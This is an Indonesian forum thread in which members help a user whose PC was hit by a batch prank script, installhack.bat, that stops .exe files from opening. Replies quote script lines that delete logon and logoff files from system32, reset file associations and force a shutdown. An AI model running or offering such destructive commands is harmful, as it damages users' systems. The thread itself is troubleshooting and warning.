Penulis Topik: Tolong saya, bagaimana mengatasi virus installhack.bat soalnya merusak file exe jadi Smadav ga bisa  (Dibaca 10885 kali)

Offline agus_suardana

  • Pro500
  • ******
  • Tulisan: 875
  • Reputation: +65535/-2
  • Jenis kelamin: Pria
    • Lihat Profil
cba download sality killer gan
biasa ny yg merusak file .exe itu sality  :-bd :-bd :-bd

Offline Ran_TH

  • Trusted Advisor
  • Pro500
  • *****
  • Tulisan: 3.463
  • Reputation: +41562/-86
  • Jenis kelamin: Pria
  • No place for Junkers in this forum!
    • Lihat Profil
    • D-One Production
cba download sality killer gan
biasa ny yg merusak file .exe itu sality  :-bd :-bd :-bd
Tapi kalau di kasus TS ini bukan Sality gan...file EXE-nya tidak diinfeksi tapi setting Windows-nya dikacaukan sehingga tidak bisa membuka file exe.

Offline SpecTyte™

  • Pro500
  • ******
  • Tulisan: 2.344
  • Reputation: +58103/-9343
  • Jenis kelamin: Pria
  • It starts with one...
    • Lihat Profil
    • Sharing Newbie tutorial, trick, and break your quest!
Apakah ada di antara kalian yang pernah terkena virus Installhack.bat seperti saya ini? (bukan virus Sality)
Mau Smadpoint? Buka dan klik dulu isi di dalamnya... :
[spoiler]http://www.questbreaker.blogspot.com[/spoiler]

Ada berbagai tips game online dan blogging loh..

Offline Yudh

  • Pro500
  • ******
  • Tulisan: 2.307
  • Reputation: +65535/-18
  • Jenis kelamin: Pria
  • yudhafb@gmail.com
    • Lihat Profil
DEL C : \ WINDOWS \system32\logoff .exe /F /Q
DEL C : \WINDOWS \system32\logon .exe /F /Q
DEL C : \ WINDOWS \system32\logon .scr /F /Q
cls
shutdown


code di atas nih yg ngga enak... :D

Offline AllenWalker

  • Pro100
  • ****
  • Tulisan: 191
  • Reputation: +1654/-623
  • Jenis kelamin: Pria
    • Lihat Profil
dari namanya installhack.bat, bisa kita tau kalo TS sedang mencoba menginstall suatu software bwat hacking yang ternyata tertipu oleh si pembuat program.
:p

ini bisa jadi pelajaran buat kita supaya tidak terlalu mengandalkan piracy, dan selalu periksa code batch file sebelum menjalankannya.

CMIIW.

(sorry kalo off-topic)
:p

Offline SpecTyte™

  • Pro500
  • ******
  • Tulisan: 2.344
  • Reputation: +58103/-9343
  • Jenis kelamin: Pria
  • It starts with one...
    • Lihat Profil
    • Sharing Newbie tutorial, trick, and break your quest!
Mau Smadpoint? Buka dan klik dulu isi di dalamnya... :
[spoiler]http://www.questbreaker.blogspot.com[/spoiler]

Ada berbagai tips game online dan blogging loh..

Offline Bobby315

  • Pro200
  • *****
  • Tulisan: 228
  • Reputation: +1348/-0
  • Jenis kelamin: Pria
  • cuma C++ programmer biasa.
    • Lihat Profil
title back is asosiasion
color 0A
@echo off
set end=md "u cant eascape from mevishnu"
set fin= copy "Hack log.txt" "Installing"
%end%
%fin%
cls
assoc .exe=exefile
assoc .txt=txtfile
assoc .mp3=mp3file

cls
msg * hi dude this is over
msg * vishnu attcked the system try to challenge him
cls
shutdown

yg plg penting yg warna merah

@TS
masih mending cuma diisengin kompi nya, dulu waktu saya masih kuliah pernah sampe dilaporin ke FBI gara2 pake software buat ngehack kartu kredit. so lupakanlah ttg hack ;D
Nothing more

Offline rioke

  • Pro500
  • ******
  • Tulisan: 853
  • Reputation: +42290/-0
  • Jenis kelamin: Pria
  • antara ada dan tiada :o
    • Lihat Profil
    • Click here to view my site ;)
@up: haha jd cuma dibalik aja langsung beres :D gw jg heran :-\ kykna ni tepatna disebut "script nakal" blm bisa disebut "pirus" ;)

klo gk slh perintah assoc dahpernah dibahas ama bro2 forsmad di thread programming CMIIW

Offline Ran_TH

  • Trusted Advisor
  • Pro500
  • *****
  • Tulisan: 3.463
  • Reputation: +41562/-86
  • Jenis kelamin: Pria
  • No place for Junkers in this forum!
    • Lihat Profil
    • D-One Production

Offline MadeOke

  • Pro200
  • *****
  • Tulisan: 276
  • Reputation: +3261/-874
  • Hello
    • Lihat Profil
Thx all
Udah bener sekarang komputernya? :D

seharusnya udah bener tu kalo script nya udah diganti